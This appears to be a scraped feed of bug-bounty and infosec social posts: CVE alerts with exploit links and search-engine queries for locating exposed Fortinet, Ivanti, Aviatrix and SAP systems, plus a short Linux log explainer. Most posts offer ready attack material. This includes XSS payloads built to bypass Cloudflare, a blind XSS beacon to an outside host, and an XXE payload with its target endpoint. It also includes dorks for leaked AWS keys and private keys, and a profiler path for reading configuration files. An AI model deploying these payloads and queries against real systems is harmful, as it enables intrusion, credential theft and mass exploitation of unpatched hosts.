⚠️ CVE-2024-53677
File upload logic in Apache Struts is flawed. An attacker can manipulate file upload params to enable paths traversal and under some this can lead to uploading a malicious file which can be used to perform Remote Code Execution.

LINK 👇
https://github.com/0xPThree/struts_cve-2024-53677

➡️ Admin-Panel-Dorks
Find The Admin Panel & SQL Injection Endpoints, Using Google Dorks !!!

https://github.com/0Xnanoboy/Admin-Panel-Dorks

#fuzzing #payload #infosec

⚠️ CVE-2024-50603 (CVSS 10)

Critical Command Injection Vulnerability in Aviatrix Controller

🔥PoC : github.com

📊 10K+ Services are found on hunter.how yearly.


👇Query
HUNTER :product.name="Aviatrix Controller"

FOFA : product="aVIaTrIX-Controller"
SHODAN : title="Aviatrix Controller"

📰Refer:securityonline.info/cve-2024-50603…


#hunterhow #infosec #infosecurity #OSINT #Vulnerability

🟣 Understanding Linux System Logs

System logs, often found in /var/log directory in Linux systems, are essential for monitoring and troubleshooting system issues. Here are short notes on some common system logs:

syslog: A general-purpose system log file that contains messages from various system services and applications. It's the main log file that many other logs feed into.

auth.log: Records authentication-related messages, including successful and failed login attempts, password changes, and user authentication events.

kern.log: Logs kernel-related messages, such as hardware errors, kernel module loading, and other kernel activities.

messages: A catch-all log file that records various system messages, including system startups, shutdowns, and general system-related events.

dmesg: Displays kernel ring buffer messages, providing a real-time view of kernel-related events and hardware detection during system boot-up.

cron: Logs messages related to cron jobs and scheduled tasks, including when they run, and any errors encountered during execution.
secure: Records security-related messages, including authentication attempts, privilege escalation, and other security-related events.

apache/access.log and apache/error.log: These logs are specific to the Apache web server. access.log records HTTP access logs, while error.log logs Apache server errors and warnings.

nginx/access.log and nginx/error.log: Similar to Apache logs, these logs are specific to the Nginx web server and record access and error events.

mysql/error.log: Records errors and warnings encountered by the MySQL database server, including startup errors, query failures, and database crashes.

These logs provide valuable insights into system performance, security events, and troubleshooting information. Regularly monitoring and analyzing these logs can help maintain system health and identify potential issues before they escalate

#infosec #learning #linux

CLOUDFLARE BYPASS [XSS] PAYLOAD: ⚔️

Add to your custom list

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

#infosec #cybersec #bugbountytips

SpideyX - A Web Reconnaissance Penetration Testing tool for Penetration Testers and Ethical Hackers that included with multiple mode with asynchronous concurrne performance. Spideyx is a tool that have 3 seperate modes and each mode are used for different approach and different methods, Spideyx is one tool but it equal to 3 tools because it have ability to crawling, Jsscraping, parameter fuzzing.

https://github.com/RevoltSecurities/Spideyx
#tools #cybersec #bugbountytips

⚡️ Poc CVE-2025-0282
✅ Ivanti Connect Secure zero-day


Hunter :

product.name="Ivanti Connect Secure"||http://product.name="Ivanti Policy Secure"||http://product.name="Ivanti Neurons for ZTA"

⬇️ Link:
https://github.com/absholi7ly/CVE-2025-0282-Ivanti-exploit

#poc #cve #infosec

AungRecon

AungRecon is a comprehensive, automated reconnaissance script for web application security assessments. It performs multiple security checks and scans on a target domain, including subdomain enumeration, SQL injection, XSS, open redirects, LFI vulnerabilities, and more. The tool integrates several popular security tools, streamlining the workflow of security analysts and penetration testers.

Features :

WhatWeb Scan: Identifies technologies, plugins, and versions used by the target website.
Subdomain Enumeration: Discovers and filters alive subdomains.
Subdomain Takeover Detection: Identifies possible subdomain takeovers.
SQL Injection Detection: Searches for SQLi vulnerabilities using parameterized URLs.
Cross-Site Scripting (XSS) Detection: Scans for XSS vulnerabilities.
Open Redirect Detection: Finds possible open redirect vulnerabilities.
Local File Inclusion (LFI) Detection: Identifies possible LFI vulnerabilities.
Nuclei Vulnerability Scans: Executes multiple vulnerability templates via Nuclei.

Link:

https://github.com/aungsanoo-usa/aungrecon?tab=readme-ov-file

Installation:

Clone the repository:
git clone https://github.com/aungsanoo-usa/aungrecon.git
cd aungrecon
chmod +x install.sh
chmod +x aungrecon.sh

Usage: To run AungRecon on a target domain, simply execute the script with the following command:
./install.sh
./aungrecon.sh

Injectra: Payload Injection via File Magic Numbers

Injectra is a robust tool designed for injecting custom payloads into files based on their magic numbers. By leveraging this technique, Injectra modifies files for penetration testing and security research purposes. The tool detects the file type by analyzing its magic numbers and injects the payload seamlessly into the correct position.

Features

- Magic Number-Based Payload Injection: Identifies file types using magic numbers and injects payloads precisely into their headers.

- Customizable Payloads: Supports user-defined payloads, with a default PHP-based payload for command execution.

- Broad File Type Support: Compatible with file types like zip, rar, docx, jpg, png, pdf, and more.

- Interactive CLI: Includes features like auto-completion for file paths and detailed prompts to guide users.

- Dependency Management: Automatically checks and installs required Python packages.

https://github.com/AnonKryptiQuz/Injectra

#tools #payload #injection

Finding the real IP behind Cloudflare has never been so easy. Here you are a tool to search on shodan

starting from a simple favicon

- https://github.com/pielco11/fav-up

#infosec #cybersec #bugbountytips

Quick and dirty way to find parameters vulnerable to LFI & Path Traversal & SSRF & Open Redirect:

Burp Search > Regex
\?.*=(\/\/?\w+|\w+\/|\w+(%3A|:)(\/|%2F)|%2F|[\.\w]+\.\w{2,4}[^\w])

And find potentially vulnerable SSRF params

- https://github.com/In3tinct/See-SURF

A Python based scanner to find potential SSRF parameters in a web application. See-SURF helps you detect potential SSRF parameters and validates the finding it by making a DNS/HTTP request back to your server. It can be added to your arsenal of recon while doing bug hunting/web security testing.




#SSRF #cybersec #lfi

CVE-2024-22024, XXE on Ivanti Connect Secure

payload , encode it to base64:

<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r>

</r> send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest

#bugbountytips #cve #infosec

⚠️ Alert
CVE-2025-0070 and CVE-2025-0066 : Two Critical Vulnerabilities in NetWeaver AS for ABAP and ABAP Platform

📊 3.2K+ Services are found on hunter.how yearly.

🔗Hunter Link:hunter.how/list?searchVal…

👇Query
HUNTER :product.name="SAP NetWeaver AS for ABAP"

Refer:securityonline.info/critical-sap-f…

#hunterhow #infosec #infosecurity #OSINT #Vulnerability

Some essential HTTP status Codes

#BugBounty #bugbountytips #cybersecurity #cybersecuritytips

⚠️ Alert

CVE-2024-55591 : Zero-Day Vulnerability in Attacks on Fortinet Firewalls with Exposed Interfaces


🔗Hunter Link:hunter.how/list?searchVal…

👇Query

HUNTER :product.name="Fortinet Firewall"

FOFA : product="FORTINET-Firewall"

📰Refer:securityonline.info/active-exploit…

#FORTINET #hunterhow #infosec #infosecurity #OSINT #fofa #Vulnerability #zeroday

Blind XSS in Private crypto target
Payload used

"><iframesrcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;#116;&#116;&#112;&#115;&#58;&#47;&#47;test.bxss.in&#34;&#59;&#117;&#109;&#101;&#110;&#116;&#46;&#62;">

#bugbountytips #bugbounty #payload

Bypass Cloudflare WAF (DOM-based XSS) ♻️

Payload:
'-alert?.(1)-'

writeup: 1337.or.id/post/stored-do…

#infosec #cybersec #bugbountytips

🐞 Bug Bounty Tip:

If you find Web frameworks like Symfony, add /app_dev.php/_profiler/open?file=app/config/parameters.yml to the wordlist, and you may get juicy data.

#bugbountytips #tips #cybersec #bugbounty

Uncover sensitive info with: inurl:notepad.link + keyword

Some example keywords:
aws_secret_access_key, "username=" "password=", VISA, PRIVATE KEY, "authToken="

More cool unpublished Dorks:

http://github.com/fatguru/dorks

#bugbountytip

⚡️ XSS Payload

Payload:

1%27;--<img%20src=x%20onerror=javascript:alert(document.domain)> 

#bugbountytips #xss #bugbounty #infosecc #cybersec